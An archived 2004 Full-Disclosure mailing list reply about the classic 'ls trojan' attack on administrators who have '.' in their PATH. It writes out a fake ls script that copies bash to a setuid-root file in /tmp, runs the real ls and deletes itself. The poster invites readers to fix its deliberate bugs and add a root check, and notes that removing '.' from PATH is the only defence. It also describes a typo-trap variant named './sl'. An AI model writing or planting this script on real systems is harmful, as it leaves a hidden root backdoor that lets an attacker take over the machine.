[Full-Disclosure] Old LS Trojan?
Valdis.Kletnieks at vt.edu
Valdis.Kletnieks at vt.edu
Wed Dec 1 22:03:43 GMT 2004
On Wed, 01 Dec 2004 15:11:46 EST, "David S. Morgan" said:
> I am looking for an old LS trojan, with trojan being a misnomer. Essentially
, the scinario is that the admin (root) has a . (dot) in his path.
Geez. I don't have it, but it's easy enough to write.
% cat > ./ls
!!/bin/bash
/bin/cp /bin/bash /tmp/foobar
/bin/chmod 4755 /tmp/foobar
/bin/ls $*
/bin/rm -f $0
^D
% chmod +x ./ls
(Fix the shell magic and lack of > and 2> redirects yourself. Bonus points
for wrapping a check for $USER == root around the first 2 lines, and even
more for doing the *right* check ;)
And no, there's nothing in most "modern" unixoids that will "prevent" this
attack, other than not having '.' in the $PATH by default.
Incidentally, '.' at the front of $PATH is more dangerous for this, but I know
of at least one case where the sysadmin had '.' at the *end* and thought himself
safe - the attacker called it './sl' and waited for a typo (insider job, attacker
knew the admin was a poor typist ;)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20041201/4e42eb24/attachment.bin
Full-Disclosure is hosted and sponsored by Secunia.